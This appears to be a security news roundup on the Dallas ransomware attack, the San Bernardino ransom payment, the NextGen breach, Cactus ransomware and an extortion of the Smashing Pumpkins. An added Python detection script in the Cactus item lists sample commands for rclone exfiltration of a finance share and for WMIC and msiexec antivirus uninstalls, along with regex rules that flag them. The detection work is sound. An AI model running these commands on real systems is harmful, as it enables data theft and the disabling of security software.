Last week, officials for the City of Dallas were forced to take many of their crucial IT services offline after their security team discovered the beginnings of a ransomware attack. The incident, which has caused the entire Dallas judicial system to delay any proceedings until further notice, has been confirmed as an attack by the Royal Ransomware group after ransom notes started printing from all network-connected printers. Ransomware attacks on local governments have risen steadily in recent years and have targeted over 30 cities in 2023 alone.
San Bernardino County pays $1.1 million ransom
A month after first identifying the ransomware attack on its systems, the San Bernardino County Sheriff's Office has agreed to pay its portion of the $1.1 million ransom to restore its files and resume normal operations. While the incident did not compromise any sensitive information on employees or citizens, the interruptions to the Sheriff's Office's operations have caused significant delays in law enforcement activities for all agencies that it regularly interacts with. San Bernardino County was only responsible for $511k of the demanded ransom, as its insurance covered the remainder.
NextGen Healthcare breach impacts over 1 million patients
The healthcare software provider NextGen Healthcare has recently announced that it was the victim of a data breach in which attackers illicitly accessed sensitive records for over 1 million patients. The breach occurred in March, and the hackers remained connected to the system for several weeks before NextGen staff secured the network. As this breach involves a significant amount of personally identifiable information, officials for NextGen have begun notifying all affected patients and are warning them to be vigilant of any phishing attempts or unusual activity regarding their credit or identity.
Cactus Ransomware encrypts itself to avoid detection
Researchers have been tracking a new ransomware variant that uses an unusual tactic to avoid detection by security software: self-encryption. The variant in question, Cactus Ransomware, begins its attack by exploiting a VPN vulnerability to access the network, then encrypts each victim file twice before running an encryption sequence on the main ransomware binary. Alongside the encryption process, Cactus also runs a batch script to uninstall any local antivirus programs and uses Rclone to exfiltrate all encrypted files for additional victim exploitation.
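Two of the behaviours described above, Rclone pushing data to a remote and a batch script uninstalling local security products, are visible in ordinary process-creation telemetry. The following is an added detection example, not code from the original post or from any Cactus research; it assumes a simplified "user|parent_image|image|command_line" event format and uses constructed sample events, so field names and the sample lines are assumptions.

```python
import re
from typing import List, Tuple

# Constructed process-creation events (not a real log export), one per line,
# in the assumed "user|parent_image|image|command_line" format.
SAMPLE_EVENTS = """\
svc|explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c type C:\\report.txt
svc|cmd.exe|C:\\Users\\svc\\rclone.exe|rclone.exe copy C:\\Shares\\Finance remote:stash --transfers 16
svc|cmd.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic product where "name like '%Antivirus%'" call uninstall /nointeractive
svc|cmd.exe|C:\\Windows\\System32\\msiexec.exe|msiexec.exe /x {PRODUCT-CODE-PLACEHOLDER} /qn
svc|explorer.exe|C:\\Program Files\\7-Zip\\7z.exe|7z.exe a C:\\archive.zip C:\\docs
"""

# rclone verbs that move data off the host, and an "rclone remote" target
# ("remote:path"); a single-letter drive such as C:\ is deliberately excluded.
RCLONE_VERBS = ("copy", "sync", "move", "copyto", "moveto")
REMOTE_RE = re.compile(r"(?<![\w\\])[A-Za-z][\w-]+:(?!\\)")
# Product removal via WMIC or msiexec, as a batch script would do it.
WMIC_UNINSTALL_RE = re.compile(r"\bwmic\b.*\bproduct\b.*\buninstall\b", re.I)
MSIEXEC_UNINSTALL_RE = re.compile(r"\bmsiexec(\.exe)?\b.*\s(/x|/uninstall)\b", re.I)
# Batch scripts run under cmd.exe; PowerShell included for scripted variants.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe"}


def detect(events: str) -> List[Tuple[str, str]]:
    """Return (rule_name, command_line) for each event matching a heuristic."""
    findings = []
    for line in events.splitlines():
        if not line.strip():
            continue
        _user, parent, image, cmd = line.split("|", 3)
        exe = image.rsplit("\\", 1)[-1].lower()
        parent_exe = parent.rsplit("\\", 1)[-1].lower()
        tokens = cmd.lower().split()
        # Rule 1: rclone transferring data to a configured remote.
        if exe == "rclone.exe" and any(v in tokens for v in RCLONE_VERBS) and REMOTE_RE.search(cmd):
            findings.append(("rclone_exfil_to_remote", cmd))
        # Rule 2: product uninstall launched from a script host.
        if parent_exe in SCRIPT_HOSTS and (WMIC_UNINSTALL_RE.search(cmd) or MSIEXEC_UNINSTALL_RE.search(cmd)):
            findings.append(("scripted_product_uninstall", cmd))
    return findings
```

Rule 2 will also fire on legitimate software-deployment scripts, so in practice it is tuned by allow-listing known deployment accounts and parents rather than by loosening the pattern.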
Smashing Pumpkins pay hackers for stolen songs
Several months prior to the release of the latest Smashing Pumpkins album, hackers were able to obtain copies of several unreleased tracks from the band and other artists, and threatened to release them if a ransom was not paid. After consulting with the FBI, the lead singer of the Smashing Pumpkins confirmed that he had paid an undisclosed ransom amount to prevent the leaks and was working to determine how the hackers were able to access the song files in the first place.